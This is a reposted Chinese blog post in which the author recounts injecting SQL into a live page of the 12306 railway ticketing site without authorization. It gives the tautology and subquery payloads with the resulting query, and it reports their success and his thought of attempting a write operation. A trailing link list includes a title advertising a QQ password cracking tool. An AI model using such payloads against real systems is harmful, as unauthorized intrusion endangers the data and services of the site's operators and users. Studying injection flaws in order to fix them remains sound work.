玩玩12306的SQL注入漏洞
来源:互联网 发布:日本男生 知乎 编辑:程序博客网 时间:2024/05/29 02:24
下午那会儿微博上疯传一张12306的SQL注入漏洞截图:
以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。
根据trace提示简单构造一个:
' OR '1'='1' OR ZIZ='
注入后的效果应就是:
select * from TB_INFO_CLCS where flag = 'Y' and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm
果了个然~!成功鸟~!
同理再构造个子查询:
' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR ZIZ='
没报错,又成功鸟~!
当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:
晚上回家后发现该漏洞已经修复鸟~~~~~~
- 玩玩12306的SQL注入漏洞
- Sql注入漏洞的例子
- SQL注入漏洞的判断
- 万恶的SQL注入漏洞
- 一个典型的sql注入漏洞
- SQL防注入漏洞的方法
- sql注入漏洞的一种实例
- SQL注入漏洞的判断_见微知著
- SQL注入漏洞的防案
- 判断sql注入漏洞的类型
- [漏洞分析] ProjectSend r561中SQL注入漏洞的浅析
- Sql 注入漏洞,注意
- SQL注入漏洞
- sql注入漏洞原理
- SQL 注入漏洞新动向
- SQL注入漏洞接触
- SQL注入漏洞
- 防范SQL注入漏洞
- 给定一个整数实现奇偶比特位互换
- 如何使得三极管输出波形的边沿变得陡峭(加速电容)
- 如何让自己的电脑屏保变为自己的电脑桌面
- freemarker 之 整合springMVC/struts2
- IOS控件UILabel总结
- 玩玩12306的SQL注入漏洞
- Liblinear的使用
- (后悔木有好好学数据结构和算法)之排序算法一
- poj2594点可重复的最小路径覆盖
- 每天学一点flash(86) LocalConnection 类
- 范型接口定义
- 游戏与备忘者模式
- 2012最新版QQExplorer在线密码破解工具 V4.6(破解正式版) QQ密码在线破解工具
- JavaScript学习笔记(十二) 回调模式(Callback Pattern)